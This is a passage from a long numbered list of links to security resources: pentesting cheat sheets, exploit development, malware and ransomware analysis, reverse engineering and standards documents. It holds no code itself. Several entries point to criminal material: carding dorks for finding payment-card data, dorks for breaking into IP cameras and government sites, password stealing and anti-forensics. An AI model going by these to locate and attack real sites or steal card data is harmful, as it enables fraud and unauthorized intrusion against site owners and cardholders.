https://catonmat.net/bash-one-liners-explained-part-one -1033-Bash One-Liners Explained, Part IV: Working with history: https://catonmat.net/bash-one-liners-explained-part-four -1034-Useful bash one-liners : https://github.com/stephenturner/oneliners -1035-Some Random One-liner Linux Commands [Part 1]: https://www.ostechnix.com/random-one-liner-linux-commands-part-1/ -1036-The best terminal one-liners from and for smart admins + devs.: https://www.ssdnodes.com/tools/one-line-wise/ -1037-Shell one-liner: https://rosettacode.org/wiki/Shell_one-liner#Racket -1038-SSH Cheat Sheet: http://pentestmonkey.net/tag/ssh -1039-7000 Google Dork List: https://pastebin.com/raw/Tdvi8vgK -1040-GOOGLE HACKİNG DATABASE – GHDB: https://pastebin.com/raw/1ndqG7aq -1041-STEALING PASSWORD WITH GOOGLE HACK: https://pastebin.com/raw/x6BNZ7NN -1042-Hack Remote PC with PHP File using PhpSploit Stealth Post-Exploitation Framework: http://www.hackingarticles.in/hack-remote-pc-with-php-file-using-phpsploit-stealth-post-exploitation-framework -1043-Open Source database of android malware: www.code.google.com/archive/p/androguard/wikis/DatabaseAndroidMalwares.wiki -1044-big-list-of-naughty-strings: https://github.com/minimaxir/big-list-of-naughty-strings/blob/master/blns.txt -1045-publicly available cap files: http://www.netresec.com/?page=PcapFiles -1046-“Insertion, Evasion, and Denial of Service: Eluding Network Intrusion Detection”: http://citeseerx.ist.psu.edu/viewdoc/download?doi=10.1.1.119.399&rep=rep1&type=pdf -1047-Building a malware analysis toolkit: https://zeltser.com/build-malware-analysis-toolkit/ -1048-Netcat Reverse Shell Cheat Sheet: http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet -1049-Packers and crypters: http://securityblog.gr/2950/detect-packers-cryptors-and-compilers/ -1050-Evading antivirus: http://www.blackhillsinfosec.com/?p=5094 -1051-cheat sheets and information,The Art of Hacking: https://github.com/The-Art-of-Hacking -1052-Error-based SQL injection: https://www.exploit-db.com/docs/37953.pdf -1053-XSS cheat sheet: https://www.veracode.com/security/xss -1054-Active Directory Enumeration with PowerShell: https://www.exploit-db.com/docs/46990 -1055-Buffer Overflows, C Programming, NSA GHIDRA and More: https://www.exploit-db.com/docs/47032 -1056-Analysis of CVE-2019-0708 (BlueKeep): https://www.exploit-db.com/docs/46947 -1057-Windows Privilege Escalations: https://www.exploit-db.com/docs/46131 -1058-The Ultimate Guide For Subdomain Takeover with Practical: https://www.exploit-db.com/docs/46415 -1059-File transfer skills in the red team post penetration test: https://www.exploit-db.com/docs/46515 -1060-How To Exploit PHP Remotely To Bypass Filters & WAF Rules: https://www.exploit-db.com/docs/46049 -1061-Flying under the radar: https://www.exploit-db.com/docs/45898 -1062-what is google hacking? and why it is useful ?and how you can learn how to use it: https://twitter.com/cry__pto/status/1142497470825545729?s=20 -1063-useful blogs for penetration testers: https://twitter.com/cry__pto/status/1142497470825545729?s=20 -1064-useful #BugBounty resources & links & tutorials & explanations & writeups :: https://twitter.com/cry__pto/status/1143965322233483265?s=20 -1065-Union- based SQL injection: http://securityidiots.com/Web-Pentest/SQL-Injection/Basic-Union-Based-SQL-Injection.html -1066-Broken access control: https://www.happybearsoftware.com/quick-check-for-access-control-vulnerabilities-in-rails -1067-Understanding firewall types and configurations: http://searchsecurity.techtarget.com/feature/The-five-different-types-of-firewalls -1068-5 Kali Linux tricks that you may not know: https://pentester.land/tips-n-tricks/2018/11/09/5-kali-linux-tricks-that-you-may-not-know.html -1069-5 tips to make the most of Twitter as a pentester or bug bounty hunter: https://pentester.land/tips-n-tricks/2018/10/23/5-tips-to-make-the-most-of-twitter-as-a-pentester-or-bug-bounty-hunter.html -1060-A Guide To Subdomain Takeovers: https://www.hackerone.com/blog/Guide-Subdomain-Takeovers -1061-Advanced Recon Automation (Subdomains) case 1: https://medium.com/p/9ffc4baebf70 -1062-Security testing for REST API with w3af: https://medium.com/quick-code/security-testing-for-rest-api-with-w3af-2c43b452e457?source=post_recirc---------0------------------ -1062-The Lazy Hacker: https://securit.ie/blog/?p=86 -1063-Practical recon techniques for bug hunters & pen testers: https://github.com/appsecco/practical-recon-levelup0x02/raw/200c43b58e9bf528a33c9dfa826fda89b229606c/practical_recon.md -1064-A More Advanced Recon Automation #1 (Subdomains): https://poc-server.com/blog/2019/01/18/advanced-recon-subdomains/ -1065-Expanding your scope (Recon automation #2): https://poc-server.com/blog/2019/01/31/expanding-your-scope-recon-automation/ -1066-RCE by uploading a web.config: https://poc-server.com/blog/2018/05/22/rce-by-uploading-a-web-config/ -1067-Finding and exploiting Blind XSS: https://enciphers.com/finding-and-exploiting-blind-xss/ -1068-Google dorks list 2018: http://conzu.de/en/google-dork-liste-2018-conzu -1096-Out of Band Exploitation (OOB) CheatSheet: https://www.notsosecure.com/oob-exploitation-cheatsheet/ -1070-Metasploit Cheat Sheet: https://nitesculucian.github.io/2018/12/01/metasploit-cheat-sheet/ -1071-Linux Post Exploitation Cheat Sheet : red-orbita.com/?p=8455 -1072-OSCP/Pen Testing Resources : https://medium.com/@sdgeek/oscp-pen-testing-resources-271e9e570d45 -1073-Out Of Band Exploitation (OOB) CheatSheet : https://packetstormsecurity.com/files/149290/Out-Of-Band-Exploitation-OOB-CheatSheet.html -1074-HTML5 Security Cheatsheet: https://html5sec.org/ -1075-Kali Linux Cheat Sheet for Penetration Testers: https://www.blackmoreops.com/2016/12/20/kali-linux-cheat-sheet-for-penetration-testers/ -1076-Responder - CheatSheet: https://www.ivoidwarranties.tech/posts/pentesting-tuts/responder/cheatsheet/ -1076-Windows Post-Exploitation Command List: pentest.tonyng.net/windows-post-exploitation-command-list/ -1077-Transfer files (Post explotation) - CheatSheet https://ironhackers.es/en/cheatsheet/transferir-archivos-post-explotacion-cheatsheet/ -1078-SQL Injection Cheat Sheet: MSSQL — GracefulSecurity: https://www.gracefulsecurity.com/sql-injection-cheat-sheet-mssql/ -1079-OSCP useful resources and tools: https://acknak.fr/en/articles/oscp-tools/ -1080-Penetration Testing 102 - Windows Privilege Escalation - Cheatsheet: www.exumbraops.com/penetration-testing-102-windows-privilege-escalation-cheatsheet -1081-Transferring files from Kali to Windows (post exploitation) : https://blog.ropnop.com/transferring-files-from-kali-to-windows/ -1082-Hack Like a Pro: The Ultimate Command Cheat Sheet for Metasploit: https://null-byte.wonderhowto.com/.../hack-like-pro-ultimate-command-cheat-sheet-f... -1083-OSCP Goldmine (not clickbait): 0xc0ffee.io/blog/OSCP-Goldmine -1084-Privilege escalation: Linux : https://vulp3cula.gitbook.io/hackers-grimoire/post-exploitation/privesc-linux -1085-Exploitation Tools Archives : https://pentesttools.net/category/exploitationtools/ -1086-From Local File Inclusion to Remote Code Execution - Part 1: https://outpost24.com/blog/from-local-file-inclusion-to-remote-code-execution-part-1 -1087-Basic Linux Privilege Escalation: https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/ -1088-Title: Ultimate Directory Traversal & Path Traversal Cheat Sheet: www.vulnerability-lab.com/resources/documents/587.txt -1089-Binary Exploitation: https://pwndevils.com/hacking/howtwohack.html 1090-A guide to Linux Privilege Escalation: https://payatu.com/guide-linux-privilege-escalation/ -1091-Penetration Testing Tools Cheat Sheet : https://news.ycombinator.com/item?id=11977304 -1092-List of Metasploit Commands - Cheatsheet: https://thehacktoday.com/metasploit-commands/ -1093-A journey into Radare 2 – Part 2: Exploitation: https://www.megabeets.net/a-journey-into-radare-2-part-2/ -1094-Remote Code Evaluation (Execution) Vulnerability: https://www.netsparker.com/blog/web-security/remote-code-evaluation-execution/ -1095-Exploiting Python Code Injection in Web Applications: https://www.securitynewspaper.com/.../exploiting-python-code-injection-web-applicat... -1096-Shells · Total OSCP Guide: https://sushant747.gitbooks.io/total-oscp-guide/reverse-shell.html -1097-MongoDB Injection cheat sheet Archives: https://blog.securelayer7.net/tag/mongodb-injection-cheat-sheet/ -1098-Basic Shellshock Exploitation: https://blog.knapsy.com/blog/2014/10/07/basic-shellshock-exploitation/ -1099-Wireshark Tutorial and Tactical Cheat Sheet : https://hackertarget.com/wireshark-tutorial-and-cheat-sheet/ -1100-Windows Command Line cheatsheet (part 2): https://www.andreafortuna.org/2017/.../windows-command-line-cheatsheet-part-2-wm... -1101-Detecting WMI exploitation: www.irongeek.com/i.php?page=videos/derbycon8/track-3-03...exploitation... 1102-Metasploit Cheat Sheet - Hacking Land : https://www.hacking.land/2019/02/metasploit-cheat-sheet.html -1103-5 Practical Scenarios for XSS Attacks: https://pentest-tools.com/blog/xss-attacks-practical-scenarios/ -1104-Ultimate gdb cheat sheet: http://nadavclaudecohen.com/2017/10/10/ultimate-gdb-cheat-sheet/ -1105-Reverse Engineering Cheat Sheet: https://www.scribd.com/doc/38163906/Reverse-Engineering-Cheat-Sheet -1106-Reverse Engineering Cheat Sheet: https://www.scribd.com/document/94575179/Reverse-Engineering-Cheat-Sheet -1107-Reverse Engineering For Malware Analysis: https://eforensicsmag.com/reverse_engi_cheatsheet/ -1108-Reverse-engineering Cheat Sheets : https://www.cheatography.com/tag/reverse-engineering/ -1109-Shortcuts for Understanding Malicious Scripts: https://www.linkedin.com/pulse/shortcuts-understanding-malicious-scripts-viviana-ross -1110-WinDbg Malware Analysis Cheat Sheet : https://oalabs.openanalysis.net/2019/02/18/windbg-for-malware-analysis/ -1111-Cheat Sheet for Malware Analysis: https://www.andreafortuna.org/2016/08/16/cheat-sheet-for-malware-analysis/ -1112-Tips for Reverse-Engineering Malicious Code : https://www.digitalmunition.me/tips-reverse-engineering-malicious-code-new-cheat-sheet -1113-Cheatsheet for radare2 : https://leungs.xyz/reversing/2018/04/16/radare2-cheatsheet.html -1114-Reverse Engineering Cheat Sheets: https://www.pinterest.com/pin/576390452300827323/ -1115-Reverse Engineering Resources-Beginners to intermediate Guide/Links: https://medium.com/@vignesh4303/reverse-engineering-resources-beginners-to-intermediate-guide-links-f64c207505ed -1116-Malware Resources : https://www.professor.bike/malware-resources -1117-Zero-day exploits: A cheat sheet for professionals: https://www.techrepublic.com/article/zero-day-exploits-the-smart-persons-guide/ -1118-Getting cozy with exploit development: https://0x00sec.org/t/getting-cozy-with-exploit-development/5311 -1119-appsec - Web Security Cheatsheet : https://security.stackexchange.com/questions/2985/web-security-cheatsheet-todo-list -1120-PEDA - Python Exploit Development Assistance For GDB: https://www.pinterest.ru/pin/789044797190775841/ -1121-Exploit Development Introduction (part 1) : https://www.cybrary.it/video/exploit-development-introduction-part-1/ -1122-Windows Exploit Development: A simple buffer overflow example: https://medium.com/bugbountywriteup/windows-expliot-dev-101-e5311ac284a -1123-Exploit Development-Everything You Need to Know: https://null-byte.wonderhowto.com/how-to/exploit-development-everything-you-need-know-0167801/ -1124-Exploit Development : https://0x00sec.org/c/exploit-development -1125-Exploit Development - Infosec Resources: https://resources.infosecinstitute.com/category/exploit-development/ -1126-Exploit Development : https://www.reddit.com/r/ExploitDev/ -1127-A Study in Exploit Development - Part 1: Setup and Proof of Concept : https://www.anitian.com/a-study-in-exploit-development-part-1-setup-and-proof-of-concept -1128-Exploit Development for Beginners: https://www.youtube.com/watch?v=tVDuuz60KKc -1129-Introduction to Exploit Development: https://www.fuzzysecurity.com/tutorials/expDev/1.html -1130-Exploit Development And Reverse Engineering: https://www.immunitysec.com/services/exploit-dev-reverse-engineering.html -1131-wireless forensics: https://www.sans.org/reading-room/whitepapers/wireless/80211-network-forensic-analysis-33023 -1132-fake AP Detection: https://www.sans.org/reading-room/whitepapers/detection/detecting-preventing-rogue-devices-network-1866 -1133-In-Depth analysis of SamSam Ransomware: https://www.crowdstrike.com/blog/an-in-depth-analysis-of-samsam-ransomware-and-boss-spider/ -1134-WannaCry ransomware: https://www.endgame.com/blog/technical-blog/wcrywanacry-ransomware-technical-analysis -1135-malware analysis: https://www.sans.org/reading-room/whitepapers/malicious/paper/2103 -1136-Metasploit's detailed communication and protocol writeup: https://www.exploit-db.com/docs/english/27935-metasploit---the-exploit-learning-tree.pdf -1137-Metasploit's SSL-generation module:: https://github.com/rapid7/metasploit-framework/blob/76954957c740525cff2db5a60bcf936b4ee06c42/lib/rex/post/meterpreter/client.rb -1139-Empire IOCs:: https://www.sans.org/reading-room/whitepapers/detection/disrupting-empire-identifying-powershell-empire-command-control-activity-38315 -1140-excellent free training on glow analysis: http://opensecuritytraining.info/Flow.html -1141-NetFlow using Silk: https://tools.netsa.cert.org/silk/analysis-handbook.pdf -1142-Deep Packet Inspection: https://is.muni.cz/th/ql57c/dp-svoboda.pdf -1143-Detecting Behavioral Personas with OSINT and Datasploit: https://www.exploit-db.com/docs/45543 -1144-WordPress Penetration Testing using WPScan and MetaSploit: https://www.exploit-db.com/docs/45556 -1145-Bulk SQL Injection using Burp-to-SQLMap: https://www.exploit-db.com/docs/45428 -1146-XML External Entity Injection - Explanation and Exploitation: https://www.exploit-db.com/docs/45374 -1147- Web Application Firewall (WAF) Evasion Techniques #3 (CloudFlare and ModSecurity OWASP CRS3): https://www.exploit-db.com/docs/45368 -1148-File Upload Restrictions Bypass: https://www.exploit-db.com/docs/45074 -1149-VLAN Hopping Attack: https://www.exploit-db.com/docs/45050 -1150-Jigsaw Ransomware Analysis using Volatility: https://medium.com/@0xINT3/jigsaw-ransomware-analysis-using-volatility-2047fc3d9be9 -1151-Ransomware early detection by the analysis of file sharing traffic: https://www.sciencedirect.com/science/article/pii/S108480451830300X -1152-Do You Think You Can Analyse Ransomware?: https://medium.com/asecuritysite-when-bob-met-alice/do-you-think-you-can-analyse-ransomware-bbc813b95529 -1153-Analysis of LockerGoga Ransomware : https://labsblog.f-secure.com/2019/03/27/analysis-of-lockergoga-ransomware/ -1154-Detection and Forensic Analysis of Ransomware Attacks : https://www.netfort.com/assets/NetFort-Ransomware-White-Paper.pdf -1155-Bad Rabbit Ransomware Technical Analysis: https://logrhythm.com/blog/bad-rabbit-ransomware-technical-analysis/ -1156-NotPetya Ransomware analysis : https://safe-cyberdefense.com/notpetya-ransomware-analysis/ -1157-Identifying WannaCry on Your Server Using Logs: https://www.loggly.com/blog/identifying-wannacry-server-using-logs/ -1158-The past, present, and future of ransomware: https://www.itproportal.com/features/the-past-present-and-future-of-ransomware/ -1159-The dynamic analysis of WannaCry ransomware : https://ieeexplore.ieee.org/iel7/8318543/8323471/08323682.pdf -1160-Malware Analysis: Ransomware - SlideShare: https://www.slideshare.net/davidepiccardi/malware-analysis-ransomware -1161-Article: Anatomy of ransomware malware: detection, analysis : https://www.inderscience.com/info/inarticle.php?artid=84399 -1162-Tracking desktop ransomware payments : https://www.blackhat.com/docs/us-17/wednesday/us-17-Invernizzi-Tracking-Ransomware-End-To-End.pdf -1163-What is Ransomware? Defined, Explained, and Explored: https://www.forcepoint.com/cyber-edu/ransomware -1164-Detect and Recover from Ransomware Attacks: https://www.indexengines.com/ransomware -1165-Wingbird rootkit analysis: https://artemonsecurity.blogspot.com/2017/01/wingbird-rootkit-analysis.html -1166-Windows Kernel Rootkits: Techniques and Analysis: https://www.offensivecon.org/trainings/2019/windows-kernel-rootkits-techniques-and-analysis.html -1167-Rootkit: What is a Rootkit and How to Detect It : https://www.veracode.com/security/rootkit -1168-Dissecting Turla Rootkit Malware Using Dynamic Analysis: https://www.lastline.com/.../dissecting-turla-rootkit-malware-using-dynamic-analysis/ -1169-Rootkits and Rootkit Detection (Windows Forensic Analysis) Part 2: https://what-when-how.com/windows-forensic-analysis/rootkits-and-rootkit-detection-windows-forensic-analysis-part-2/ -1170-ZeroAccess – an advanced kernel mode rootkit : https://www.botnetlegalnotice.com/ZeroAccess/files/Ex_12_Decl_Anselmi.pdf -1171-Rootkit Analysis Identification Elimination: https://acronyms.thefreedictionary.com/Rootkit+Analysis+Identification+Elimination -1172-TDL3: The Rootkit of All Evil?: static1.esetstatic.com/us/resources/white-papers/TDL3-Analysis.pdf -1173-Avatar Rootkit: Dropper Analysis: https://resources.infosecinstitute.com/avatar-rootkit-dropper-analysis-part-1/ -1174-Sality rootkit analysis: https://www.prodefence.org/sality-rootkit-analysis/ -1175-RootKit Hook Analyzer: https://www.resplendence.com/hookanalyzer/ -1176-Behavioral Analysis of Rootkit Malware: https://isc.sans.edu/forums/diary/Behavioral+Analysis+of+Rootkit+Malware/1487/ -1177-Malware Memory Analysis of the IVYL Linux Rootkit: https://apps.dtic.mil/docs/citations/AD1004349 -1178-Analysis of the KNARK rootkit : https://linuxsecurity.com/news/intrusion-detection/analysis-of-the-knark-rootkit -1179-32 Bit Windows Kernel Mode Rootkit Lab Setup with INetSim : https://medium.com/@eaugusto/32-bit-windows-kernel-mode-rootkit-lab-setup-with-inetsim-e49c22e9fcd1 -1180-Ten Process Injection Techniques: A Technical Survey of Common and Trending Process Injection Techniques: https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process -1181-Code & Process Injection - Red Teaming Experiments: https://ired.team/offensive-security/code-injection-process-injection -1182-What Malware Authors Don't want you to know: https://www.blackhat.com/.../asia-17-KA-What-Malware-Authors-Don't-Want-You-To-Know -1183-.NET Process Injection: https://medium.com/@malcomvetter/net-process-injection-1a1af00359bc -1184-Memory Injection like a Boss : https://www.countercept.com/blog/memory-injection-like-a-boss/ -1185-Process injection - Malware style: https://www.slideshare.net/demeester1/process-injection -1186-Userland API Monitoring and Code Injection Detection: https://0x00sec.org/t/userland-api-monitoring-and-code-injection-detection/5565 -1187-Unpacking Redaman Malware & Basics of Self-Injection Packers: https://liveoverflow.com/unpacking-buhtrap-malware-basics-of-self-injection-packers-ft-oalabs-2/ -1188-Code injection on macOS: https://knight.sc/malware/2019/03/15/code-injection-on-macos.html -1189-(Shell)Code Injection In Linux Userland : https://blog.sektor7.net/#!res/2018/pure-in-memory-linux.md -1190-Code injection on Windows using Python: https://www.andreafortuna.org/2018/08/06/code-injection-on-windows-using-python-a-simple-example/ -1191-What is Reflective DLL Injection and how can be detected?: https://www.andreafortuna.org/cybersecurity/what-is-reflective-dll-injection-and-how-can-be-detected/ -1192-Windows Process Injection: https://modexp.wordpress.com/2018/08/23/process-injection-propagate/ -1193-A+ cheat sheet: https://www.slideshare.net/abnmi/a-cheat-sheet -1194-A Bettercap Tutorial — From Installation to Mischief: https://danielmiessler.com/study/bettercap/ -1195-Debugging Malware with WinDbg: https://www.ixiacom.com/company/blog/debugging-malware-windbg -1195-Malware analysis, my own list of tools and resources: https://www.andreafortuna.org/2016/08/05/malware-analysis-my-own-list-of-tools-and-resources/ -1196-Getting Started with Reverse Engineering: https://lospi.net/developing/software/.../assembly/2015/03/.../reversing-with-ida.html -1197-Debugging malicious windows scriptlets with Google chrome: https://medium.com/@0xamit/debugging-malicious-windows-scriptlets-with-google-chrome-c31ba409975c -1198-Intro to Radare2 for Malware Analysis: https://malwology.com/2018/11/30/intro-to-radare2-for-malware-analysis/ -1199-Intro to Malware Analysis and Reverse Engineering: https://www.cybrary.it/course/malware-analysis/ -1200-Common Malware Persistence Mechanisms: https://resources.infosecinstitute.com/common-malware-persistence-mechanisms/ -1201-Finding Registry Malware Persistence with RECmd: https://digital-forensics.sans.org/blog/2019/05/07/malware-persistence-recmd -1202-Windows Malware Persistence Mechanisms : https://www.swordshield.com/blog/windows-malware-persistence-mechanisms/ -1203- persistence techniques: https://www.andreafortuna.org/2017/07/06/malware-persistence-techniques/ -1204- Persistence Mechanism - an overview | ScienceDirect Topics: https://www.sciencedirect.com/topics/computer-science/persistence-mechanism -1205-Malware analysis for Linux: https://www.sothis.tech/en/malware-analysis-for-linux-wirenet/ -1206-Linux Malware Persistence with Cron: https://www.sandflysecurity.com/blog/linux-malware-persistence-with-cron/ -1207-What is advanced persistent threat (APT)? : https://searchsecurity.techtarget.com/definition/advanced-persistent-threat-APT -1208-Malware Analysis, Part 1: Understanding Code Obfuscation : https://www.vadesecure.com/en/malware-analysis-understanding-code-obfuscation-techniques/ -1209-Top 6 Advanced Obfuscation Techniques: https://sensorstechforum.com/advanced-obfuscation-techniques-malware/ -1210-Malware Obfuscation Techniques: https://dl.acm.org/citation.cfm?id=1908903 -1211-How Hackers Hide Their Malware: Advanced Obfuscation: https://www.darkreading.com/attacks-breaches/how-hackers-hide-their-malware-advanced-obfuscation/a/d-id/1329723 -1212-Malware obfuscation techniques: four simple examples: https://www.andreafortuna.org/2016/10/13/malware-obfuscation-techniques-four-simple-examples/ -1213-Malware Monday: Obfuscation: https://medium.com/@bromiley/malware-monday-obfuscation-f65239146db0 -1213-Challenge of Malware Analysis: Malware obfuscation Techniques: https://www.ijiss.org/ijiss/index.php/ijiss/article/view/327 -1214-Static Malware Analysis - Infosec Resources: https://resources.infosecinstitute.com/malware-analysis-basics-static-analysis/ -1215-Malware Basic Static Analysis: https://medium.com/@jain.sm/malware-basic-static-analysis-cf19b4600725 -1216-Difference Between Static Malware Analysis and Dynamic Malware Analysis: http://www.differencebetween.net/technology/difference-between-static-malware-analysis-and-dynamic-malware-analysis/ -1217-What is Malware Analysis | Different Tools for Malware Analysis: https://blog.comodo.com/different-techniques-for-malware-analysis/ -1218-Detecting Malware Pre-execution with Static Analysis and Machine Learning: https://www.sentinelone.com/blog/detecting-malware-pre-execution-static-analysis-machine-learning/ -1219-Limits of Static Analysis for Malware Detection: https://ieeexplore.ieee.org/document/4413008 -1220-Kernel mode versus user mode: https://blog.codinghorror.com/understanding-user-and-kernel-mode/ -1221-Understanding the ELF: https://medium.com/@MrJamesFisher/understanding-the-elf-4bd60daac571 -1222-Windows Privilege Abuse: Auditing, Detection, and Defense: https://medium.com/palantir/windows-privilege-abuse-auditing-detection-and-defense-3078a403d74e -1223-First steps to volatile memory analysis: https://medium.com/@zemelusa/first-steps-to-volatile-memory-analysis-dcbd4d2d56a1 -1224-Maliciously Mobile: A Brief History of Mobile Malware: https://medium.com/threat-intel/mobile-malware-infosec-history-70f3fcaa61c8 -1225-Modern Binary Exploitation Writeups 0x01: https://medium.com/bugbountywriteup/binary-exploitation-5fe810db3ed4 -1226-Exploit Development 01 — Terminology: https://medium.com/@MKahsari/exploit-development-01-terminology-db8c19db80d5 -1227-Zero-day exploits: A cheat sheet for professionals: https://www.techrepublic.com/article/zero-day-exploits-the-smart-persons-guide/ -1228-Best google hacking list on the net: https://pastebin.com/x5LVJu9T -1229-Google Hacking: https://pastebin.com/6nsVK5Xi -1230-OSCP links: https://pastebin.com/AiYV80uQ -1231-Pentesting 1 Information gathering: https://pastebin.com/qLitw9eT -1232-OSCP-Survival-Guide: https://pastebin.com/kdc6th08 -1233-Googledork: https://pastebin.com/qKwU37BK -1234-Exploit DB: https://pastebin.com/De4DNNKK -1235-Dorks: https://pastebin.com/cfVcqknA -1236-GOOGLE HACKİNG DATABASE: https://pastebin.com/1ndqG7aq -1237-Carding Dorks 2019: https://pastebin.com/Hqsxu6Nn -1238-17k Carding Dorks 2019: https://pastebin.com/fgdZxy74 -1239-CARDING DORKS 2019: https://pastebin.com/Y7KvzZqg -1240-sqli dork 2019: https://pastebin.com/8gdeLYvU -1241-Private Carding Dorks 2018: https://pastebin.com/F0KxkMMD -1242-20K dorks list fresh full carding 2018: https://pastebin.com/LgCh0NRJ -1243-8k Carding Dorks :): https://pastebin.com/2bjBPiEm -1244-8500 SQL DORKS: https://pastebin.com/yeREBFzp -1245-REAL CARDING DORKS: https://pastebin.com/0kMhA0Gb -1246-15k btc dorks: https://pastebin.com/zbbBXSfG -1247-Sqli dorks 2016-2017: https://pastebin.com/7TQiMj3A -1248-Here is kind of a tutorial on how to write google dorks.: https://pastebin.com/hZCXrAFK -1249-10k Private Fortnite Dorks: https://pastebin.com/SF9UmG1Y -1250-find login panel dorks: https://pastebin.com/9FGUPqZc -1251-Shell dorks: https://pastebin.com/iZBFQ5yp -1252-HQ PAID GAMING DORKS: https://pastebin.com/vNYnyW09 -1253-10K HQ Shopping DORKS: https://pastebin.com/HTP6rAt4 -1254-Exploit Dorks for Joomla,FCK and others 2015 Old but gold: https://pastebin.com/ttxAJbdW -1255-Gain access to unsecured IP cameras with these Google dorks: https://pastebin.com/93aPbwwE -1256-new fresh dorks: https://pastebin.com/ZjdxBbNB -1257-SQL DORKS FOR CC: https://pastebin.com/ZQTHwk2S -1258-Wordpress uploadify Dorks Priv8: https://pastebin.com/XAGmHVUr -1259-650 DORKS CC: https://pastebin.com/xZHARTyz -1260-3k Dorks Shopping: https://pastebin.com/e1XiNa8M -1261-DORKS 2018 : https://pastebin.com/YAZkPJ0j -1262-HQ FORTNITE DORKS LIST: https://pastebin.com/rzhiNad8 -1263-HQ PAID DORKS MIXED GAMING LOL STEAM ..MUSIC SHOPING: https://pastebin.com/VwVpAvj2 -1264-Camera dorks: https://pastebin.com/fsARft2j -1265-Admin Login Dorks: https://pastebin.com/HWWNZCph -1266-sql gov dorks: https://pastebin.com/C8wqyNW8 -1267-10k hq gaming dorks: https://pastebin.com/cDLN8edi -1268-HQ SQLI Google Dorks For Shops/Amazon! Enjoy! : https://pastebin.com/y59kK2h0 -1269-Dorks: https://pastebin.com/PKvZYMAa -1270-10k btc dorks: https://pastebin.com/vRnxvbCu -1271-7,000 Dorks for hacking into various sites: https://pastebin.com/n8JVQv3X -1272-List of information gathering search engines/tools etc: https://pastebin.com/GTX9X5tF -1273-FBOSINT: https://pastebin.com/5KqnFS0B -1274-Ultimate Penetration Testing: https://pastebin.com/4EEeEnXe -1275-massive list of information gathering search engines/tools : https://pastebin.com/GZ9TVxzh -1276-CEH Class: https://pastebin.com/JZdCHrN4 -1277-CEH/CHFI Bundle Study Group Sessions: https://pastebin.com/XTwksPK7 -1278-OSINT - Financial: https://pastebin.com/LtxkUi0Y -1279-Most Important Security Tools and Resources: https://pastebin.com/cGE8rG04 -1280-OSINT resources from inteltechniques.com: https://pastebin.com/Zbdz7wit -1281-Red Team Tips: https://pastebin.com/AZDBAr1m -1282-OSCP Notes by Ash: https://pastebin.com/wFWx3a7U -1283-OSCP Prep: https://pastebin.com/98JG5f2v -1284-OSCP Review/Cheat Sheet: https://pastebin.com/JMMM7t4f -1285-OSCP Prep class: https://pastebin.com/s59GPJrr -1286-Complete Anti-Forensics Guide: https://pastebin.com/6V6wZK0i -1287-The Linux Command Line Cheat Sheet: https://pastebin.com/PUtWDKX5 -1288-Command-Line Log Analysis: https://pastebin.com/WEDwpcz9 -1289-An A-Z Index of the Apple macOS command line (OS X): https://pastebin.com/RmPLQA5f -1290-San Diego Exploit Development 2018: https://pastebin.com/VfwhT8Yd -1291-Windows Exploit Development Megaprimer: https://pastebin.com/DvdEW4Az -1292-Some Free Reverse engineering resources: https://pastebin.com/si2ThQPP -1293-Sans: https://pastebin.com/MKiSnjLm -1294-Metasploit Next Level: https://pastebin.com/0jC1BUiv -1295-Just playing around....: https://pastebin.com/gHXPzf6B -1296-Red Team Course: https://pastebin.com/YUYSXNpG -1297-New Exploit Development 2018: https://pastebin.com/xaRxgYqQ -1298-Good reviews of CTP/OSCE (in no particular order):: https://pastebin.com/RSPbatip -1299-Vulnerability Research Engineering Bookmarks Collection v1.0: https://pastebin.com/8mUhjGSU -1300-Professional-hacker's Pastebin : https://pastebin.com/u/Professional-hacker -1301-Google Cheat Sheet: http://www.googleguide.com/print/adv_op_ref.pdf -1302-Shodan for penetration testers: https://www.defcon.org/images/defcon-18/dc-18-presentations/Schearer/DEFCON-18-Schearer-SHODAN.pdf -1303-Linux networking tools: https://gist.github.com/miglen/70765e663c48ae0544da08c07006791f -1304-DNS spoofing with NetHunter: https://cyberarms.wordpress.com/category/nethunter-tutorial/ -1305-Tips on writing a penetration testing report: https://www.sans.org/reading-room/whitepapers/bestprac/writing-penetration-testing-report-33343 -1306-Technical penetration report sample: https://tbgsecurity.com/wordpress/wp-content/uploads/2016/11/Sample-Penetration-Test-Report.pdf -1307-Nessus sample reports: https://www.tenable.com/products/nessus/sample-reports -1308-Sample penetration testing report: https://www.offensive-security.com/reports/sample-penetration-testing-report.pdf -1309-jonh-the-ripper-cheat-sheet: https://countuponsecurity.com/2015/06/14/jonh-the-ripper-cheat-sheet/ -1310-ultimate guide to cracking foreign character passwords using hashcat: http://www.netmux.com/blog/ultimate-guide-to-cracking-foreign-character-passwords-using-has -1311-Building_a_Password_Cracking_Rig_for_Hashcat_-_Part_III: https://www.unix-ninja.com/p/Building_a_Password_Cracking_Rig_for_Hashcat_-_Part_III -1312-cracking story how i cracked over 122 million sha1 and md5 hashed passwords: http://blog.thireus.com/cracking-story-how-i-cracked-over-122-million-sha1-and-md5-hashed-passwords/ -1313-CSA (Cloud Security Alliance) Security White Papers: https://cloudsecurityalliance.org/download/ -1314-NIST Security Considerations in the System Development Life Cycle: https://nvlpubs.nist.gov/nistpubs/legacy/sp/nistspecialpublication800-64r2.pdf -1315-ISO 29100 information technology security techniques privacy framework: https://www.iso.org/standard/45123.html -1316-NIST National Checklist Program: https://nvd.nist.gov/ncp/repository -1317-OWASP Guide to Cryptography: https://www.owasp.org/index.php/Guide_to_Cryptography -1318-NVD (National Vulnerability Database): https://nvd.nist.gov/ -1319-CVE details: https://cvedetails.com/ -1320-CIS Cybersecurity Tools: https://www.cisecurity.org/cybersecurity-tools/ -1321-Security aspects of virtualization by ENISA: https://www.enisa.europa.eu/publications/security-aspects-of-virtualization/ -1322-CIS Benchmarks also provides a security guide for VMware, Docker, and Kubernetes: https://www.cisecurity.org/cis-benchmarks/ -1323-OpenStack's hardening of the virtualization layer provides a secure guide to building the virtualization layer: https://docs.openstack.org/security-guide/compute/hardening-the-virtualization-layers.html -1324-Docker security: https://docs.docker.com/engine/security/security/ -1325-Microsoft Security Development Lifecycle: http://www.microsoft.com/en-us/SDL/ -1326-OWASP SAMM Project: https://www.owasp.org/index.php/OWASP_SAMM_Project -1327-CWE/SANS Top 25 Most Dangerous Software Errors: https://cwe.mitre.org/top25/ -1329-OWASP Vulnerable Web Applications Directory Project: 